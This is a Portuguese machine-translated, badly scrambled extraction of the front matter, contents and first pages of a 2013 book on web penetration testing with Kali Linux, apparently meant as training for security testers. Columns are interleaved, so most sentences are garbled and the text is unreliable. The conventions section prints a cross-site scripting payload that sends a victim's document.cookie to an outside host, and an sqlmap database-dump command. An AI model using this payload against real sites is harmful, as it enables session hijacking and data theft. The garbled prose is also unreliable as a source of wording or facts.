empresas e produtos mencionados Monica Ajmera Mehta Mdia Deception na conferncia ASIS
neste livro atravs da utilizao Grficos Internacional de 2013, alto-falante
Teste de Invaso Web com adequada de capitais. Ronak Dhruv para Eliminar KaliLinux No entanto, Packt Publishing no Coordenador de Produo Rede pontos cegos com webinar Data Um guia prtico para a implementao pode garantir a preciso das Aditi Gajjar Center Segurana, alto-falante para de testes de penetrao informaes. Capa Trabalho fazer Trazer estratgias em sites, aplicaes web e Data de publicao: setembro 2013 Aditi Gajjar Seu prprio dispositivo (BYOD) padro Referncia de Produo: 1180913 Christopher Smith Trabalhar no Solutions Forum protocolos da web com Kali Linux. Publicado por Packt Publishing Ltd. Clyde Jenkins Governo, Washington Jos Muniz Livery Lugar Coordenador do Projeto DC, e um artigo sobre a comprometer Aamir Lakhani 35 Livery Rua Anugya Khurana senhas em PenTest Magazine - BIRMINGHAM - MUMBAI Birmingham B3 2PB, Reino Unido. [FM-3] Backtrack ISBN 978-1-78216-316-9 Compndio, julho de 2013. Teste de Invaso Web com Kali Linux www.packtpub.com Sobre os autores Fora do trabalho, ele pode ser Copyright 2013 Packt Publishing Cubra Imagem por Karl Moore Jos Muniz um arquiteto de encontrado por trs de toca-discos de Todos os direitos reservados. (karl.moore @ ukonline.co.uk) solues tcnicas e de segurana vinil arranhando clssico ou no Nenhuma parte deste livro pode ser [FM-2] pesquisador. Ele comeou o campo de futebol mexer com os reproduzida, armazenada em um sua carreira em desenvolvimento de clubes locais. sistema, ou transmitida de qualquer Crditos software e redes depois gerida como Este livro no poderia ter sido feito forma ou por qualquer meio, sem a Autores um contratado sem o apoio da minha prvia e por escrito Jos Muniz recurso tcnico. Joseph mudou-se encantadora esposa Ning e permisso do editor, exceto no caso Aamir Lakhani para consultoria e descobriu uma inspiraes criativas da minha filha de breves citaes embutidas em Revisores paixo por segurana Raylin. Eu tambm deve creditar a artigos ou crticas. Revisores durante a reunio com uma variedade minha paixo por aprender a meu Todo esforo foi feito na preparao Adrian Hayter de clientes. Ele esteve envolvido com irmo deste livro para garantir a preciso Danang Heriyadi o projeto Alex, que me criou junto com meus das informaes apresentadas. No Tajinder Singh Kalsi e implementao de vrios projetos pais amorosos Irene e Ray. entanto, a informao contida neste Brian Sak que vo desde empresas Fortune 500 E eu gostaria de dar um livro Kunal Sehgal para agradecimento final que a todos os vendido sem garantia, expressa ou Nitin.K. Sookun (ISH) grandes redes federais. meus amigos, implcita. Nem os autores, nem Packt Aquisio do Editor Joseph executado familiares e colegas que me apoiaram Publishing, e os seus revendedores e Vinay Argekar TheSecurityBlogger.com site, um dos ao longo dos anos. distribuidores sero responsveis por Editor Tcnico chumbo recursos mais populares sobre [FM-4] quaisquer danos Amey Varangaonkar segurana e implementao do causados ou supostamente causados Editores Tcnicos produto. Voc tambm pode encontrar Aamir Lakhani uma das principais direta ou indiretamente por este livro. Pooja Arondekar Joseph falando em eventos ao vivo Cyber Security e Cyber Contra Packt Publishing tem se esforado Sampreshita Maheshwari , bem como com outras publicaes arquiteto. Ele responsvel pelo para fornecer informaes sobre Menza Mathew envolvido. Os acontecimentos fornecimento de solues de TI de marca registrada de todos os Indexador recentes incluem alto-falante for Social segurana para grandes comercial e organizaes empresariais federais. todo bom homem. " em seu blog em FuzzerByte Gostaria especialmente de agradecer Lakhani lidera projetos que Eu gostaria de dedicar este livro aos (http://www.fuzzerbyte.com). Krunal Rajawadha (Autor implementam posturas de segurana meus pais, e Mahmood Gostaria de agradecer aos meus pais Executivo de Relacionamento na para empresas da Fortune 500, Nasreen, e irms, e Noureen Zahra. por me dar vida, sem eles, eu Packt Publishing) para vir atravs de o Departamento de Defesa dos EUA, Obrigado por sempre no estaria aqui hoje, minha mim os principais provedores de sade, incentivando o pequeno hacker mim. namorada para me apoiar cada dia atravs do meu blog e me oferecer instituies de ensino, Eu no poderia ter feito isso sem com sorriso e amor, meus amigos, esta oportunidade. Gostaria tambm e financeira e organizaes de mdia. seu apoio. Obrigado me e pai por que eu no posso descrever um por de agradecer minha famlia e Lakhani projetou contra-ofensiva seus sacrifcios. Eu faria um. amigos ntimos para me apoiar medidas de defesa para as agncias Tambm gosto tambm de agradecer Danang Heriyadi um pesquisador de quando eu estava de defesa e inteligncia e aos meus amigos e colegas para o segurana de computadores indonsia trabalhando neste projeto. organizaes tem assistido seu especializada Tajinder Singh Kalsi o co-fundador e em defender-se do ataque ativo de incontvel encorajamento e [FM-6] Chief Technical Evangelist em volta os ataques perpetrados por orientao. Estou verdadeiramente Virscent metro abenoado para ser Technologies Pvt. Ltd, com mais de Brian Sak, CCIE # 14441, grupos cibernticos. Lakhani trabalhando com as pessoas mais seis anos de experincia de trabalho atualmente um Arquiteto de Solues considerado um lder na indstria de inteligentes e mais dedicadas do na rea de Tcnico da Cisco apoio detalhado mundo. TI. Ele comeou sua carreira com Sistemas, onde ele est envolvido no compromissos de arquitetura e [FM-5] WIPRO como Associate Tcnico, e desenvolvimento de solues e ajuda projetos sobre tpicos relacionados mais tarde tornou-se os parceiros da Cisco defesa ciberntica, mobile Sobre os Revisores Consultor cum instrutor de TI. A partir Construir e melhorar os seus servios ameaas de aplicao, malware e e quebrar em aplicaes web. Ele de agora, ele realiza seminrios em de consultoria. Antes da Cisco, Brian ameaas persistentes avanadas de possui um Mestrado licenciatura em faculdades em todo realizada segurana pesquisa (APT), e Segurana da Informao ndia, sobre temas, tais como a Servios de consultoria e avaliao Segurana das Trevas. Lakhani o e uma licenciatura Formado em segurana da informao, para grandes instituies financeiras, autor e colaborador de vrios livros, e Cincia da Computao pela Royal desenvolvimento de aplicaes governo dos EUA tem Holloway, Universidade de Londres. Android, Organismos e empresas da Fortune apareceu na National Public Radio Adrian Hayter um testador de computing desenvolvimento de sites, e 500. Ele tem quase 20 anos de como um especialista em Cyber penetrao com mais de 10 anos de nuvem, e cobriu mais de 100 indstria Security. experincia em desenvolvimento faculdades Experincia com a maioria dos que Escrevendo sob o pseudnimo de Dr. em engenharia e software explorao e cerca de 8500 estudantes, mais at passaram em Segurana da Chaos, Lakhani tambm opera o reversa com mais de cinco anos mos agora. Alm de treinamento, ele Informao. Alm de DrChaos.com na experincia. tambm mantm um blog Inmeras certificaes de segurana e blogue. Em sua lista recente de 46 Ele est atualmente trabalhando em (www.virscent.com / blog), Que bate da indstria tcnicas, Brian tem um federais Tecnologia Peritos para Siga Hatsecure como um instrutor para em vrios truques de hackers. Peg-lo mestrado no Twitter, a Forbes "Exploit avanada e no facebook em-www.facebook.com / Em Segurana da Informao e revista descreveu Aamir Lakhani como Shellcode Desenvolvimento ". Como tajinder.kalsi.tj ou seguir o seu Esfrance, e um contribuinte para o "um blogueiro, especialista infosec, pesquisador, ele gosta de compartilhar stiowww.tajinderkalsi.com. Centro de super-heri ... e o conhecimento de TI Segurana Internet Security e outros livros e Oceano ndico, na bela ilha de [FM-8] publicaes com foco em segurana. Maurcio. Ele comeou sua carreira de [FM-7] computao www.PacktPub.com como empresrio e fundou Indra Co. Arquivos de suporte, eBooks, ofertas Totalmente pesquisvel atravs de O curso de segurana do ciberespao Ltd. Na busca de mais um desafio, ele de desconto e mais cada livro publicado pela Packt da faculdade da Gergia (Canad), e entregou a gesto do negcio sobre a Voc pode querer visitar Copiar e colar, imprimir e contedo tem sido sua famlia e se juntou Linkbynet www.PacktPub.com para os arquivos favorito Associado com organizaes indiano de suporte e downloads relacionados On demand e acessvel via navegador financeiras desde ento. Isso no s Oceano Ltd como Engenheiro de ao seu livro. Se voc tiver uma conta com a Packt lhe deu sistema Unix / Linux. Ele atualmente Voc sabia que Packt oferece verses www.PacktPub.com, Voc pode usar Experincia em um lugar onde a um engenheiro da Laranja e-book de todos os livros publicados, isso para o acesso segurana crucial, mas tambm lhe Servios s empresas. com PDF PacktLib hoje e vista nove livros forneceu Nitin tem sido um defensor openSUSE e arquivos disponveis ePub? Voc totalmente gratuitos. Basta usar suas Valiosos conhecimentos desde 2009 e passa seu tempo livre pode atualizar para a verso e-book credenciais de login especializados no campo. evangelizando Linux e FOSS. Ele em www.PacktPub. para acesso imediato. Cunhal Segall (KunSeh.com) entrou um membro ativo de vrios grupos de com e como um cliente livro impresso, [FM-9] no setor de segurana de TI aps a usurios voc tem direito a um desconto na Acesso gratuito para os titulares de concluso e projetos de cdigo aberto, entre elas cpia eBook. contas Packt Atualmente, ele dirige est dirigindo as openSUSE Project, MATE Project Entre em contato com a gente no operaes de TI de segurana, para a Desktop, service@packtpub.com para mais ndice analtico Regio APAC de um Fundao Software Livre, Linux User detalhes. Prefcio Dos maiores bancos europeus. No Group de Maurcio, eo Maurcio Em www.PacktPub.com, Voc Captulo 1: Teste de Invaso e geral, ele tem cerca de 10 anos de Artesanato de software comunitrio. tambm pode ler uma coleo de Configurao experincia em diversas Ele gosta de scripting em Bash, Perl, e artigos tcnicos gratuitos, sinal Conceitos de testes de penetrao de Funes que vo desde a avaliao Python, e geralmente publica seu -se para uma srie de boletins aplicativos Web de vulnerabilidade, a governana de trabalho sobre informativos gratuitos e receber Metodologia Teste de Invaso segurana e de seu blog. Seu mais recente trabalho descontos exclusivos e ofertas em Calculando risco Avaliao de risco para "Projeto Evil Genius" um roteiro Packt Conceitos Kali Testes de Penetrao monitoramento de segurana. Ele adaptado para porta / install livros e eBooks. Passo 1 - Reconhecimento possui uma srie de certificaes para Ferramentas de Teste de Invaso em TM Etapa 2 - Avaliao Alvo o seu openSUSE. Seus tutoriais so muitas http://PacktLib.PacktPub.com Passo 3 - Explorao nomear, incluindo prpria OSCP do vezes traduzidos para vrios Voc precisa de solues imediatas Passo 4 - Privilege Escalation Backtrack, e outros, como TCNA, lnguas e compartilhada dentro da para suas perguntas de TI? PacktLib Passo 5 - a manuteno de um ponto CISM, comunidade open source. Nitin um est online de Packt de apoio CCSK, Security +, roteador Cisco de pensador livre biblioteca de livros digitais. Aqui, voc Apresentando Kali Linux Segurana, ISO 27001 LA, ITIL. e acredita em compartilhar pode acessar, ler e pesquisar em toda Configurao do sistema Kali Nitin Sookun (MBCS) um nerd conhecimento. Ele gosta de socializar Packt Correndo Kali Linux a partir de uma apaixonado que residem no corao com os profissionais de biblioteca de livros. mdia externa de vrios campos. Por que assinar? Instalando Kali Linux Kali Linux e VM imagem primeira 41 OWASP-Zap 123 corrida 41 Websploit 124 Viso geral ferramentas Kali Explorao 73 Resumo ndice analtico Metasploit 72 Objetivos de reconhecimento Postagens de emprego w3af Ataques do lado do cliente: Captulo 4 A pesquisa inicial Localizao Explorando os sistemas de e-mail A engenharia social Site da empresa Shodan Ataques de fora bruta Engenharia Social Toolkit (SET) Fontes de histria Web Google hackers Hidra Usando SET para clonar e ataque Registros Regionais da Internet (RIRs) Google Hacking Banco de Dados DirBuster [Ii] Eletrnico coleta de dados, anlise e Pesquisando redes WebSlayer 129 recuperao (EDGAR) Nmap Cracking senhas 129 Recursos de mdia social HTTrack - clonar um site John the Ripper 130 Confiana Tcnicas de reconhecimento de ICMP Man-in-the-middle 132 8 Tcnicas de reconhecimento DNS Tira SSL 9 Identificao do alvo DNS Resumo ndice analtico 14 Grficos de coleta de informaes - Resumo MitM Proxy 17 Maltego Iniciando o ataque - redirecionamento Hospedar digitalizao 17 FOCA - site metadados Configurando o redirecionamento de 18 Reconnaissance porta usando o Iptables Sumrio 19 41 74 Nenhuma entrada de sumrio foi 19 42 74 encontrada. 20 42 78 21 44 81 21 45 85 Hospedar digitalizao com Nessas 21 48 89 Obteno e rachaduras senhas de 22 49 95 usurios 29 52 96 As senhas do Windows 29 53 96 Kali quebra de senha ferramentas 31 55 102 Johnny 1 57 105 hashcat e oclHashcat 7 66 107 samdump2 Captulo 2: Reconhecimento 59 107 chntpw 33 Ataques do lado do servidor: Captulo 110 Ophcrack 34 3 113 Crunch 34 A avaliao da vulnerabilidade 119 Outras ferramentas disponveis no Kali 35 Webshag 119 Hash-identificador 36 Skipfish 121 dictstat 39 ProxyStrike 122 RainbowCrack (rcracki_mt) 40 Vega 127 findmyhash phrasendrescher 184 Outras ferramentas 236 CmosPwd 187 urlsnarf 238 creddump 190 acccheck 240 Resumo 193 hexinject 242 Montagem do Windows 193 Patator 245 Senhas Linux 154 DBPwAudit 245 Instalando o Nessus em Kali 155 Resumo 246 Usando o Nessus 145 Explorao Navegador Quadro - 247 143 146 Carne 248 144 Autenticao Atacar: Captulo 5 FoxyProxy - Plugin do Firefox 248 145 Atacar o gerenciamento de sesses BURP Proxy 249 151 Clickjacking OWASP - ZAP 252 153 Cookies de sesso Sequestro web Colheita senha SET 253 155 Sesso de Ferramentas Web Fimap 254 156 Plugins do Firefox Negao de Servios (DoS) 254 159 Firesheep - Plugin do Firefox THC-SSL-DOS 256 161 Web Developer - Plugin do Firefox Scapy 196 161 Greasemonkey - Plugin do Firefox SlowLoris 198 165 Biscoito Injector - Plugin do Firefox Low Orbit Ion Canho 200 168 Os cookies Gestor + - Plugin do Outras ferramentas 203 170 Firefox DNSCHEF 204 170 Biscoito Cadger SniffJoke 205 171 Wireshark Cerco 206 172 Hamster e Ferret Inundator 208 173 Man-in-the-middle ataque TCPReplay 208 173 dsniff e arpspoof Resumo 209 173 175 Testando suas defesas 209 174 [Iii] Segurana da linha de base 210 174 STIG 210 177 ndice analtico O gerenciamento de patches 210 177 Captulo 6: Ataques Web As diretivas de senha Captulo 7: contramedidas defensivas 178 Ettercap 211 251 179 Emalhe 211 [Iv] 180 SQL Injection 216 180 SqlMap 218 ndice analtico 180 Cross-site scripting (XSS) 225 Espelhe o seu ambiente 181 Testando cross-site scripting 230 HTTrack 182 Cookie de XSS roubo / sequestro 234 Outras ferramentas de clonagem 183 Autenticao 235 Man-in-the-middle defesa Defesa tira SSL Captulo 8: Teste de Penetrao 294 identificar e explorar vulnerabilidades Negao de Servio defesa Relatrio Executivo [V] em Defesa de Cookies Observncia sistemas. Este livro escrito Defesa Clickjacking Os padres da indstria ndice analtico ferramentas de alavancagem Forense digital Servios profissionais ndice disponveis em Kali Linux liberados Kali Forensics Bota Documentao Declarao de Trabalho (SOW) 13 de maro, 2013, bem como outras dc3dd Formato do relatrio Teste de Invaso Externa aplicaes de cdigo aberto. Outras ferramentas forenses em Kali Capa Material adicional SOW Teste de Invaso Web com Kali Linux chkrootkit Declarao de Confidencialidade Kali ferramentas de relatrios projetado para ser um guia para Autpsia Controle de documentos Dradis profissionais Binwalk Timeline KeepNote Testadores de penetrao que pdf-parser Resumo executivo Maltego CaseFile procuram incluir Kali em uma Principal Metodologia MagicTree penetrao de aplicaes web Pasco Procedimentos de teste detalhadas CutyCapt noivado. Nosso objetivo identificar a Bisturi Resumo dos resultados Exemplos de relatrios melhor ferramenta de Kali (s) para bulk_extractor Vulnerabilidades Resumo uma tarefa especfica, Anlise do Sistema de Arquivos com Consideraes de rede e 313 fornecer detalhes sobre como usar o Kali recomendaes 295 aplicativo (s), e oferecem exemplos do 257 Apndices 296 que informaes 257 Glossrio 298 poderia ser obtida para fins de com 259 Resumo 300 base em experincia de campo 259 277 300 especialista relatrio. Kali tem 261 276 301 vrios programas e utilitrios, no 262 278 301 entanto, este livro vai concentrar-se na 263 279 301 ferramenta mais forte (s) 264 280 302 para uma tarefa especfica no 265 282 302 momento da publicao. 266 282 311 Os captulos deste livro so divididos 269 283 [Vi] em tarefas utilizados na aplicao web 271 283 do mundo real 271 284 Prefcio Teste de Invaso. Captulo 1, testes 271 284 Kali um arsenal Teste de Invaso de penetrao e de instalao, 274 285 baseado no Debian Linux usado por fornece uma viso geral 275 286 segurana Testes de Penetrao conceitos 275 288 profissionais (e outros) para realizar bsicos, estratgias de servios 275 289 avaliaes de segurana. Kali oferece profissionais, fundo 276 290 uma sobre o meio ambiente Kali Linux, ea 276 292 variedade de conjuntos de criao de Kali para temas 267 294 ferramentas personalizadas para apresentados neste livro. Captulos 2-6, abrangem vrios Teste de Penetrao de outros comprometer a forma como os dados Penetrao ps relatrios de servio aplicativos web conceitos de testes de servios, descrio da metodologia e so armazenados em sistemas host, e de teste profissionais. Os tpicos penetrao, incluindo direcionamento man-in-the-middle ataque incluem uma viso geral exemplos de configurao e relatrios aplicaes web. Este captulo tambm tcnicas. Este captulo tambm de mtodos para agregar valor ao seu destinados a destacar temas fornece passos utilizados para aborda brevemente em SQL e produto final, a formatao do abordados se pode configurar uma Kali ataques Cross-Site Scripting. documento e os modelos realizar seu objetivo desejado. Ambiente Linux para tarefas Captulo 6, ataques na Web, explora que pode ser usado para construir Captulo 7, contramedidas defensivas, abordados neste livro. como tirar proveito de servidores web relatrios profissionais. serve como uma fonte de reparao Captulo 2, Reconhecimento, fornece e [2] em sistemas vrias maneiras de coletar aplicaes web que utilizam exploits vulnervel a ataques apresentados informaes sobre um de compromisso como a explorao Prefcio nos captulos anteriores. Captulo 8, alvo. Os tpicos incluem ferramentas de navegador, procurao O que voc precisa para este livro Teste de Penetrao gratuitas populares destacando ataques, e colheita de senha. Este Os leitores devem ter uma Relatrio Executivo, oferece relatrios disponveis na Internet como captulo abrange igualmente os compreenso bsica de aplicaes melhores prticas e exemplos que bem como a recolha de informao mtodos para interromper web, networking podem servir como utilitrios disponveis em Kali Linux. servios utilizando tcnicas de conceitos e metodologia de testes de modelos para a construo de Captulo 3, os ataques lado do negao de servio. penetrao. Este livro vai incluir relatrios de nvel executivo. O servidor, centra-se na identificao e Captulo 7, contramedidas defensivas, detalhada objetivo de projetar o livro em explorao de vulnerabilidades fornece as melhores prticas para o exemplos de como executar um desta forma dar ao leitor um guia em servidores web e aplicaes. seu endurecimento ataque usando ferramentas oferecidas para envolver uma penetrao de Ferramentas cobertos esto aplicaes web e servidores. Os em Kali Linux, bem como aplicaes web disponveis em Kali ou outro aberto tpicos incluem linhas de base de outras aplicaes de cdigo aberto. com a ferramenta melhor possvel (s) utilitrios de origem. segurana, gerenciamento de No necessrio, mas benfico ter disponvel em Kali, oferecer medidas Captulo 4, Ataques lado do cliente, patches, experincia para remediar uma vulnerabilidade alvos hospeda sistemas. Os tpicos polticas de senha, e defender-se usando verses anteriores do e fornecer dados capturados como incluem a engenharia social, contra os mtodos de ataque Backtrack ou programas similares. poderia ser apresentada de uma explorando vulnerabilidades do abordados no anterior Os requisitos de hardware para a forma profissional. sistema host e atacando as senhas, captulos. Este captulo tambm inclui construo de um ambiente de pois so os mais uma seo forense focados, pois laboratrio e criao da Kali Prefcio meio comum para proteger os importante Arsenal Linux so abordados em O que este livro cobre sistemas host. para investigar adequadamente um Captulo 1, testes de penetrao e de Captulo 1, testes de penetrao e de Captulo 5, Atacar de autenticao, ativo comprometido para evitar Instalao. instalao, abrange os fundamentos analisa a forma como os usurios e impacto negativo adicional. Que este livro para da construo de uma dispositivos para autenticar web Captulo 8, Penetrao Teste O pblico-alvo deste livro so prtica profissional Teste de Invaso. aplicaes. Os tpicos incluem a Relatrio Executivo, abrange as testadores de penetrao profissionais Os tpicos incluem a diferenciao de segmentao do processo de melhores prticas para o ou outros um gerenciamento de sesses de desenvolvimento de olhando para maximizar Kali Linux autenticao, para um Teste de Invaso do servidor web ou aplicao exerccio. Se voc est procurando Novos termos e palavras importantes Embora tenhamos tomado todos os deparar com as cpias ilegais de identificar como realizar um teste de so mostradas em negrito. As cuidados para garantir a exatido dos nossos trabalhos, sob qualquer forma, penetrao contra palavras que voc v na nossos contedos, erros na internet, por favor aplicaes web e achados a um tela, em menus ou caixas de dilogo, acontecem. Se voc encontrar um nos fornecer o endereo de cliente uma forma profissional, em por exemplo, aparecem no texto erro em um dos nossos livros, talvez localizao ou nome do site seguida, assim: "Em breve um erro no texto ou imediatamente para que possamos este livro para voc. como ns, clique no Executar boto, o cdigo-ficaramos muito gratos se buscar um remdio. Convenes ns recebemos uma injeo de SQL ". voc iria relatar isso para ns. Ao Entre em contato conosco Neste livro, voc vai encontrar uma Avisos ou notas importantes fazer isso, voc pode copyright@packtpub.com com um link srie de estilos de texto que aparecem em uma caixa como esta. salvar outros leitores de frustrao e para a suspeita distinguem entre Dicas e truques aparecer assim. nos ajudar a melhorar as verses material pirateado. diferentes tipos de informao. Aqui Feedback do leitor subseqentes deste Agradecemos a sua ajuda na proteo esto alguns exemplos desses estilos, O feedback dos nossos leitores livro. Se voc encontrar qualquer de nossos autores, e nossa e um sempre bem-vindo. Deixe-nos saber o errata, por favor informe-los visitando capacidade de trazer explicao do seu significado. que voc pensa http://www.packtpub. voc um contedo valioso. Palavras de cdigo no texto so Neste livro, o que voc gostou ou no com.br / submeter-errata, A seleo Perguntas apresentados da seguinte forma: "Por gostou pode ter. Feedback do leitor de seu livro, clicando no formulrio de Voc pode contatar-nos em exemplo, voc pode ligar para o perfil importante para o apresentao de errata link, questions@packtpub.com se voc My First Scan ou qualquer outra coisa nos a desenvolver ttulos que voc e inserir os detalhes da sua errata. est tendo um problema que voc gostaria. " realmente tirar o mximo proveito de. Uma vez que seu errata so com qualquer aspecto do livro, e ns Um bloco de cdigo definido da Para nos enviar feedback geral, basta verificados, a sua submisso faremos o nosso melhor para resolv- seguinte forma: enviar um e-mail para Sero aceitos ea errata ser lo. <script> document.write ("<img src = feedback@packtpub.com, carregado no nosso site, ou [5] 'http://kali.drchaos.com/var/www/xss_ e mencionar o ttulo do livro atravs do adicionado a qualquer lista de laboratrio / lab_script.php? "+ assunto da mensagem. errata existente, sob a seo Errata Teste de Invaso document.cookie +"> ") </ script> Se existe um tema que voc tem desse ttulo. Qualquer errata existente e Configurao Qualquer entrada de linha de experincia em e voc est pode ser visto Muitas organizaes oferecem comando ou a sada escrita da interessado em qualquer escrita seleccionando o seu ttulo de servios de segurana e de uso de seguinte forma: ou contribuir para um livro, consulte o http://www.packtpub.com/support. termos tais como auditoria de SqlMap-u nosso guia autor em [4] segurana, http://www.drchaous.com/article.php?i www.packtpub.com / autores. rede ou avaliao de risco, e d=5 Atendimento ao Cliente Prefcio Penetration Test com significados teste - despejo Errata Pirataria sobrepostos. -U teste-dump Agora que voc o orgulhoso A pirataria de material com direitos Por definio, uma auditoria uma -T-L tablesnamehere proprietrio de um livro Packt, temos autorais na internet um problema avaliao tcnica mensurvel de um [3] uma srie de coisas para constante em todas as mdias. sistema (s) ou ajud-lo a obter o mximo de sua No Packt, tomamos a proteo de aplicativo (s). As avaliaes de Prefcio compra. nossos direitos autorais e licenas segurana so as avaliaes de risco, muito a srio. Se voc ou seja, os servios usado para identificar vulnerabilidades Verificador da penetrao pode est a trabalhar com o seu cliente servios, bem como orientaes para em sistemas, aplicaes e processos. determinar toda a infra-estrutura de durante uma sesso de design para a construo de uma prtica Teste de Invaso vai alm de uma segurana e associado desenvolver um escopo aceitvel profissional Teste de Invaso. avaliao atravs da avaliao risco de um ativo valioso. de trabalho que no tem impacto Conceitos incluem diferenciar um teste identificado O Teste de Invaso no tornar as sobre o valor dos resultados. de penetrao de outros servios, a vulnerabilidades para verificar se a redes mais seguras! Teste de Invaso Web com Kali Linux- metodologia vulnerabilidade real ou um falso o prxima gerao de BackTrack-se viso geral, e visando aplicaes web. positivo. Por exemplo, Teste de Invaso e Configurao uma Este captulo tambm fornece uma uma auditoria ou uma avaliao pode Esta uma m interpretao comum e hands-on guia que ir fornecer-lhe breve utilizar ferramentas de verificao que deve ser claramente explicado a todos passo-a-passo mtodos para viso geral da criao de um teste de fornecem algumas centenas os potenciais encontrar vulnerabilidades Kali Linux ou ambiente real. possveis vulnerabilidades em vrios clientes. Teste de Invaso avalia a e explorao de aplicaes web. Este Teste de Invaso aplicao Web sistemas. Um teste de penetrao eficcia da segurana existente. Se livro vai cobrir alvos pesquisando, conceitos tentaria um cliente no tem uma forte identificando A aplicao web qualquer aplicativo para atacar essas vulnerabilidades da segurana, em seguida, eles vo e explorao de vulnerabilidades em que usa um navegador web como um mesma maneira como um hacker receber pouco valor a partir de aplicaes web, bem como os clientes cliente. Esta lata malicioso para verificar Servios de testes de penetrao. que usam web ser um frum de mensagens simples quais vulnerabilidades so genunos Como consultor, recomenda-se que a servios de aplicao, defendendo ou uma folha de clculo muito reduzir a lista verdadeira das penetrao aplicaes web contra ataques complexo. As aplicaes web so vulnerabilidades do sistema para Os servios de anlise so oferecidos comuns, e popular baseado na facilidade de um punhado de falhas de segurana. como forma de verificar a segurana edifcio Teste de Invaso os produtos acesso a servios e gerenciamento Os Testes de Penetrao mais para os sistemas existentes, uma vez para a prtica de servios centralizado de um sistema eficazes so os que um cliente acredita que eles tenham profissionais. Ns utilizado por vrios partidos. que visam um sistema muito esgotado todos os esforos para acredito que este livro timo para Requisitos para acessar um aplicativo especfico, com um objetivo muito assegurar a esses sistemas e so quem est interessado em aprender web pode seguir especfico. Qualidade sobre a pronto para avaliar se existem lacunas como se tornar um padres de cliente navegador indstria quantidade existentes na obteno desses Verificador da penetrao, os usurios simplificar as expectativas, tanto do o verdadeiro teste de um teste de sistemas. que so novos para Kali Linux e prestadores de servios, bem como os penetrao bem-sucedida. Posicionando um escopo adequado querem aprender as caractersticas anfitries acessar o aplicativo. Enumerando um nico sistema de trabalho fundamental quando a e as diferenas de Kali contra [8] durante venda de servios de testes de BackTrack, e testadores de um ataque direcionado revela mais penetrao. penetrao experientes que podem Captulo 1 sobre a segurana do sistema e O escopo do trabalho define o que os precisa de uma reciclagem ou de As aplicaes web so o tipo mais tempo de resposta para lidar com sistemas e as aplicaes esto a ser referncia sobre novas ferramentas e utilizado de aplicaes dentro de incidentes que ataque amplo espectro. alvo, bem como tcnicas. qualquer Escolhendo cuidadosamente alvos o que conjuntos de ferramentas Este captulo vai quebrar os conceitos organizao. Eles so o padro para a valiosos, uma podem ser usadas para comprometer fundamentais por trs vrios maioria das aplicaes baseadas na vulnerabilidades que so encontradas. segurana Internet. Se voc olhar Melhores prticas em smartphones e tablets, voc vai todos os trs nveis. Outras reas de servem como ferramentas para o meio ambiente, pode ser difcil descobrir que a maioria das avaliao que podem ser includos no melhorar uma sesso de design para estimar quanto tempo a fase de aplicaes nesses dispositivos mbito da o desenvolvimento de um escopo de reconhecimento tambm so aplicaes web. Isso trabalho so como os dispositivos so trabalho. vai durar. Isso geralmente apresenta criou uma superfcie rica em alvo novo obtidos por funcionrios, como os Metodologia Teste de Invaso um problema de faturamento. Os e grande para dispositivos so usados fora de H passos lgicos recomendados clientes, na maioria dos casos, no profissionais de segurana, bem como acessar o aplicativo, a rede (s) para a realizao de um teste de so os atacantes exploram esses circundante, a manuteno dos penetrao. O primeiro disposto a assinar um cheque em sistemas. sistemas, passo identificar o status de iniciar o branco para voc gastar tempo e Aplicaes web de teste de e os usurios dos sistemas. Alguns projeto. A terminologia mais comum recursos ilimitados em penetrao podem variar em escopo exemplos de por que essas outras definindo o estado de partida Caixa- a fase de reconhecimento, no entanto, j que h um grande nmero reas de abrangncia preta teste, Caixa branca teste, ou se voc no passar o tempo de tipos de sistema e os casos de uso assunto est tendo o servidor Linux uma mistura necessrio, em seguida, o seu de negcios para servios de comprometida, permitindo conexo a entre branco e preto teste de caixa Penetration Test acabou antes de aplicativos web. O ncleo da web partir de um conhecido como Caixa cinza teste. comear. Tambm irrealista porque camadas de aplicaes que so dispositivo mvel infectado por outros [9] um motivado servidores de hospedagem, meios ou a obteno de um atacante no ter, necessariamente, dispositivos de acesso e depsito de dispositivo mvel autorizado Teste de Invaso e Configurao os mesmos de escopo e de dados atravs de mdias sociais para Caixa preta assume o verificador da faturamento restries na deve ser testada, juntamente com a capturar informaes confidenciais. penetrao no tem conhecimento Tester Penetrao profissional. por comunicao entre as camadas Ns inclumos modelos para definir o prvio do alvo isso que recomendamos caixa cinza durante uma teia escopo de uma penetrao de rede, os processos da empresa, ou sobre exerccio Teste de Invaso aplicao. aplicaes web em Captulo servios que fornece. Iniciando um Teste de caixa preta. Um exemplo para o desenvolvimento 8, Penetrao Teste Relatrio projeto de caixa preta Caixa branca quando um verificador de um escopo para um teste de Executivo. Alguns exemplos requer uma grande quantidade de da penetrao tem conhecimento penetrao de aplicaes web o Deliverable nesta oferta captulo reconhecimento e, tipicamente, um ntimo sobre o sistema. teste levantamentos checkbox que podem acoplamento mais com base no Os objetivos do teste de penetrao aplicaes de um servidor Linux de ajudar com andar um cliente atravs conceito que os atacantes do mundo so claramente definidos e os hospedagem para dispositivos mveis. de possveis alvos real podem passar longos perodos de resultados do relatrio O escopo do trabalho em um para uma aplicao web mbito Teste tempo estudando alvos a partir do teste normalmente mnimo deve incluir a avaliao do de Invaso de trabalho. Cada escopo antes de lanar ataques. esperado. O testador foi fornecido servidor Linux (sistema operacional, do trabalho deve Como um profissional de segurana, com detalhes sobre rede ser personalizado em torno de encontramos testes de caixa preta o alvo, tais como informaes sobre a configurao, e assim por diante), as objetivos de negcio do seu cliente, apresenta alguns problemas quando rede, o tipo de sistemas, processos da aplicaes alojadas no servidor, como prazo esperado de escopo um teste de penetrao. empresa, e os sistemas e desempenho, recursos alocados, e Dependendo do sistema e sua servios. Teste de caixa branca, usurios autenticados, dispositivos resultado desejado. Como afirmado familiaridade com tipicamente focada em um objetivo clientes que acessam o servidor ea anteriormente, os modelos de negcio especfico comunicao entre , tais como a uma necessidade download de ferramentas e execut- Atacantes de verdade no tem limites, Prazo do trabalho realizado: Quando o conformidade, em vez da avaliao los) no escolhem alvos aleatrios. tais como tempo, o financiamento, a teste deve iniciar e que genrico, e pode ser Eles so tica, ou ferramentas significado o prazo previsto para atingir as metas um engate mais curto, dependendo da motivados e tm geralmente que a limitao de mbito Teste de especificadas. A melhor prtica no forma como o espao-alvo limitado. interagiram de alguma forma com o Invaso pode no representar um limitar Caixa branca seu alvo antes de cenrio do mundo real. o escopo de tempo para o horrio atribuies poderia reduzir coleta de tentar um ataque. Caixa cinza uma Em contraste com um alcance comercial. informaes esforos, como abordagem opo atraente para limitado, tendo um alcance ilimitado Como as metas so Avaliado: Que reconhecimento muitos segurana nunca pode 